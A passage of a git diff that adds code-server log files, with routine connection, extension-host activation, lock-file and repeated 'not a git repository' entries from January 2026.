+2026-01-20 00:45:21.192 [info] [192.168.100.179][e4545eee][ExtensionHostConnection] <720> Launched Extension Host Process. +2026-01-20 00:45:21.440 [info] [192.168.100.179][e4545eee][ExtensionHostConnection] <720> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-20 00:45:58.368 [info] [192.168.100.179][d1b4c654][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-20 00:46:00.747 [info] [192.168.100.179][6cd9e92b][ManagementConnection] New connection established. +2026-01-20 00:46:01.383 [info] [192.168.100.179][c69ea7d7][ExtensionHostConnection] New connection established. +2026-01-20 00:46:01.387 [info] [192.168.100.179][c69ea7d7][ExtensionHostConnection] <1261> Launched Extension Host Process. +2026-01-20 00:46:01.670 [info] [192.168.100.179][c69ea7d7][ExtensionHostConnection] <1261> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-20 00:49:04.148 [info] [192.168.100.179][6cd9e92b][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-20 00:49:04.220 [info] [192.168.100.179][c69ea7d7][ExtensionHostConnection] <1261> Extension Host Process exited with code: 0, signal: null. +2026-01-20 03:46:32.452 [info] [192.168.100.179][e4545eee][ExtensionHostConnection] <720> Extension Host Process exited with code: 0, signal: null. +2026-01-20 06:10:18.889 [error] [172.21.0.5][7f4f9863][ExtensionHostConnection] Unknown reconnection token (never seen). +2026-01-20 06:10:19.035 [error] [172.21.0.5][bc07b6d0][ManagementConnection] Unknown reconnection token (never seen). +2026-01-20 07:44:23.379 [info] [172.21.0.5][16d2077c][ManagementConnection] New connection established. +2026-01-20 07:44:24.510 [info] [172.21.0.5][cca0f4dd][ExtensionHostConnection] New connection established. +2026-01-20 07:44:24.542 [info] [172.21.0.5][cca0f4dd][ExtensionHostConnection] <35425> Launched Extension Host Process. +2026-01-20 07:44:24.896 [info] [172.21.0.5][cca0f4dd][ExtensionHostConnection] <35425> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-20 16:16:28.435 [info] [172.21.0.5][16d2077c][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-20 16:16:28.694 [info] [172.21.0.5][cca0f4dd][ExtensionHostConnection] <35425> Extension Host Process exited with code: 0, signal: null. +2026-01-20 17:08:02.370 [info] [192.168.100.179][5d3a631c][ManagementConnection] New connection established. +2026-01-20 17:08:03.387 [info] [192.168.100.179][a0263863][ExtensionHostConnection] New connection established. +2026-01-20 17:08:03.393 [info] [192.168.100.179][a0263863][ExtensionHostConnection] <129658> Launched Extension Host Process. +2026-01-20 17:08:03.667 [info] [192.168.100.179][a0263863][ExtensionHostConnection] <129658> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-20 17:23:16.909 [warning] [File Watcher (node.js)] Watcher shutdown because watched path got deleted diff --git a/code-server-config/data/logs/20260120T172343/exthost1/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T172343/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T172343/exthost1/remoteexthost.log b/code-server-config/data/logs/20260120T172343/exthost1/remoteexthost.log new file mode 100755 index 0000000..2c3826a --- /dev/null +++ b/code-server-config/data/logs/20260120T172343/exthost1/remoteexthost.log @@ -0,0 +1,19 @@ +2026-01-20 17:28:03.278 [info] Extension host with pid 742 started +2026-01-20 17:28:03.278 [error] Error: EEXIST: file already exists, open '/config/data/User/workspaceStorage/-54297bf2/vscode.lock' +2026-01-20 17:28:03.280 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Could not acquire lock, checking if the file is stale. +2026-01-20 17:28:03.290 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': The pid 129658 appears to be gone. +2026-01-20 17:28:03.290 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Deleting a stale lock. +2026-01-20 17:28:03.304 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Lock acquired. +2026-01-20 17:28:03.394 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 17:28:03.395 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 17:28:03.653 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-20 17:28:03.691 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-20 17:28:03.691 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 17:28:03.938 [info] Eager extensions activated +2026-01-20 17:28:03.938 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 17:28:03.939 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 17:28:04.005 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-20 17:28:29.951 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-20 17:53:26.041 [info] Extension host terminating: parent process 212 does not exist anymore: kill ESRCH (code: ESRCH) (errno: -3) +2026-01-20 17:53:26.042 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-20 17:53:26.060 [info] Extension host with pid 742 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T172343/exthost1/vscode.git/Git.log b/code-server-config/data/logs/20260120T172343/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..d212282 --- /dev/null +++ b/code-server-config/data/logs/20260120T172343/exthost1/vscode.git/Git.log @@ -0,0 +1,32 @@ +2026-01-20 17:28:03.901 [info] [main] Log level: Info +2026-01-20 17:28:03.901 [info] [main] Validating found git in: "git" +2026-01-20 17:28:03.901 [info] [main] Using git "2.43.0" from "git" +2026-01-20 17:28:03.901 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 17:28:03.901 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:28:03.901 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:28:03.901 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:28:03.901 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:28:03.901 [info] > git rev-parse --show-toplevel [0ms] +2026-01-20 17:28:03.901 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:28:03.901 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:28:03.901 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:28:03.901 [info] > git rev-parse --show-toplevel [3ms] +2026-01-20 17:28:03.901 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:28:03.901 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:28:03.901 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:28:03.901 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:28:03.901 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:28:03.901 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-20 17:28:04.142 [info] > git rev-parse --show-toplevel [4ms] +2026-01-20 17:28:04.142 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:28:04.959 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:28:04.959 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T172343/exthost1/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T172343/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..980cd58 --- /dev/null +++ b/code-server-config/data/logs/20260120T172343/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-20 17:28:03.832 [info] Reading sessions from keychain... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.832 [info] Got 0 sessions for ... +2026-01-20 17:28:03.832 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.833 [info] Got 0 sessions for ... +2026-01-20 17:28:03.833 [info] Getting sessions for all scopes... +2026-01-20 17:28:03.833 [info] Got 0 sessions for ... +2026-01-20 17:28:05.037 [info] Getting sessions for all scopes... +2026-01-20 17:28:05.037 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T172343/exthost1/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T172343/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..eea4965 --- /dev/null +++ b/code-server-config/data/logs/20260120T172343/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 17:28:04.096 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T172343/ptyhost.log b/code-server-config/data/logs/20260120T172343/ptyhost.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T172343/remoteagent.log b/code-server-config/data/logs/20260120T172343/remoteagent.log new file mode 100755 index 0000000..ef32f56 --- /dev/null +++ b/code-server-config/data/logs/20260120T172343/remoteagent.log @@ -0,0 +1,13 @@ +2026-01-20 17:23:43.985 [info] + + + + +2026-01-20 17:23:43.995 [info] Extension host agent started. +2026-01-20 17:23:44.028 [error] [192.168.100.179][a0263863][ExtensionHostConnection] Unknown reconnection token (never seen). +2026-01-20 17:23:44.131 [error] [192.168.100.179][5d3a631c][ManagementConnection] Unknown reconnection token (never seen). +2026-01-20 17:28:02.039 [info] [192.168.100.179][fa712925][ManagementConnection] New connection established. +2026-01-20 17:28:02.757 [info] [192.168.100.179][5d2090d7][ExtensionHostConnection] New connection established. +2026-01-20 17:28:02.815 [info] [192.168.100.179][5d2090d7][ExtensionHostConnection] <742> Launched Extension Host Process. +2026-01-20 17:28:03.095 [info] [192.168.100.179][5d2090d7][ExtensionHostConnection] <742> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/code-server-config/data/logs/20260120T175427/exthost1/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T175427/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost1/remoteexthost.log b/code-server-config/data/logs/20260120T175427/exthost1/remoteexthost.log new file mode 100755 index 0000000..24f44f9 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost1/remoteexthost.log @@ -0,0 +1,15 @@ +2026-01-20 17:55:31.174 [info] Extension host with pid 728 started +2026-01-20 17:55:31.184 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Lock acquired. +2026-01-20 17:55:31.291 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 17:55:31.292 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 17:55:31.412 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-20 17:55:31.450 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-20 17:55:31.450 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 17:55:31.741 [info] Eager extensions activated +2026-01-20 17:55:31.741 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 17:55:31.741 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 17:55:31.978 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-20 17:55:37.761 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-20 18:02:47.295 [info] Extension host terminating: received terminate message from renderer +2026-01-20 18:02:47.296 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-20 18:02:47.316 [info] Extension host with pid 728 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T175427/exthost1/vscode.git/Git.log b/code-server-config/data/logs/20260120T175427/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..d6fd570 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost1/vscode.git/Git.log @@ -0,0 +1,38 @@ +2026-01-20 17:55:31.829 [info] [main] Log level: Info +2026-01-20 17:55:31.829 [info] [main] Validating found git in: "git" +2026-01-20 17:55:31.829 [info] [main] Using git "2.43.0" from "git" +2026-01-20 17:55:31.829 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 17:55:31.829 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:55:31.829 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:31.829 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:55:31.829 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:31.829 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:55:31.829 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:31.829 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:55:31.829 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:31.829 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:55:31.829 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:31.829 [info] > git rev-parse --show-toplevel [26ms] +2026-01-20 17:55:31.829 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:31.834 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:55:31.834 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:31.838 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-20 17:55:31.842 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:55:31.842 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:32.098 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:55:32.098 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:55:32.834 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 17:55:32.834 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 17:57:38.221 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 17:57:38.221 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T175427/exthost1/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T175427/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..29a6377 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-20 17:55:31.520 [info] Reading sessions from keychain... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.520 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.520 [info] Got 0 sessions for ... +2026-01-20 17:55:31.641 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.641 [info] Got 0 sessions for ... +2026-01-20 17:55:31.722 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.722 [info] Got 0 sessions for ... +2026-01-20 17:55:31.722 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.722 [info] Got 0 sessions for ... +2026-01-20 17:55:31.722 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.722 [info] Got 0 sessions for ... +2026-01-20 17:55:31.722 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.722 [info] Got 0 sessions for ... +2026-01-20 17:55:31.722 [info] Getting sessions for all scopes... +2026-01-20 17:55:31.722 [info] Got 0 sessions for ... +2026-01-20 17:55:32.923 [info] Getting sessions for all scopes... +2026-01-20 17:55:32.923 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T175427/exthost1/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T175427/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..4056772 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-20 17:55:31.829 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T175427/exthost2/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T175427/exthost2/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost2/remoteexthost.log b/code-server-config/data/logs/20260120T175427/exthost2/remoteexthost.log new file mode 100755 index 0000000..2a39f27 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost2/remoteexthost.log @@ -0,0 +1,22 @@ +2026-01-20 18:02:49.693 [info] Extension host with pid 2941 started +2026-01-20 18:02:49.701 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Lock acquired. +2026-01-20 18:02:49.784 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-20 18:02:49.785 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-20 18:02:49.933 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-20 18:02:49.951 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-20 18:02:49.951 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-20 18:02:50.107 [info] Eager extensions activated +2026-01-20 18:02:50.107 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 18:02:50.107 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-20 18:02:54.016 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-20 18:05:50.864 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-20 19:50:09.988 [info] ExtensionService#_doActivateExtension vscode.html-language-features, startup: false, activationEvent: 'onLanguage:html' +2026-01-20 19:51:07.867 [info] ExtensionService#_doActivateExtension vscode.tunnel-forwarding, startup: false, activationEvent: 'onTunnel' +2026-01-21 01:22:42.510 [info] Extension host terminating: received terminate message from renderer +2026-01-21 01:22:42.511 [info] Lock '/config/data/User/workspaceStorage/-54297bf2/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-21 01:22:42.544 [error] [vscode.html-language-features] provider FAILED +2026-01-21 01:22:42.544 [error] Error: Starting server failed + at T.$start (/app/code-server/lib/vscode/extensions/html-language-features/client/dist/node/htmlClientMain.js:2:56998) + at async T.sendRequest (/app/code-server/lib/vscode/extensions/html-language-features/client/dist/node/htmlClientMain.js:2:40589) + at async sS.provideColors (file:///app/code-server/lib/vscode/out/vs/workbench/api/node/extensionHostProcess.js:144:164465) +2026-01-21 01:22:42.551 [info] Extension host with pid 2941 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T175427/exthost2/vscode.git/Git.log b/code-server-config/data/logs/20260120T175427/exthost2/vscode.git/Git.log new file mode 100755 index 0000000..27d5f26 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost2/vscode.git/Git.log @@ -0,0 +1,215 @@ +2026-01-20 18:02:50.144 [info] [main] Log level: Info +2026-01-20 18:02:50.144 [info] [main] Validating found git in: "git" +2026-01-20 18:02:50.144 [info] [main] Using git "2.43.0" from "git" +2026-01-20 18:02:50.144 [info] [Model][doInitialScan] Initial repository scan started +2026-01-20 18:02:50.144 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 18:02:50.144 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:50.144 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 18:02:50.144 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:50.148 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 18:02:50.149 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:50.176 [info] > git rev-parse --show-toplevel [24ms] +2026-01-20 18:02:50.176 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:50.182 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 18:02:50.182 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:50.186 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 18:02:50.187 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:50.191 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 18:02:50.191 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:50.194 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-20 18:02:51.343 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 18:02:51.343 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:53.810 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 18:02:53.810 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:02:54.115 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 18:02:54.115 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:12:01.824 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 18:12:01.824 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 18:22:34.045 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 18:22:34.045 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 19:50:10.072 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 19:50:10.073 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 19:50:15.790 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 19:50:15.790 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 19:50:15.796 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 19:50:15.796 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 19:50:35.967 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 19:50:35.967 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 21:31:33.053 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 21:31:33.053 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 21:59:48.521 [info] > git rev-parse --show-toplevel [0ms] +2026-01-20 21:59:48.521 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:00:17.468 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:00:17.468 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:00:17.977 [info] > git rev-parse --show-toplevel [1ms] +2026-01-20 22:00:17.977 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-20 22:15:54.616 [info] > git rev-parse --show-toplevel [2ms] +2026-01-20 22:15:54.616 [info] 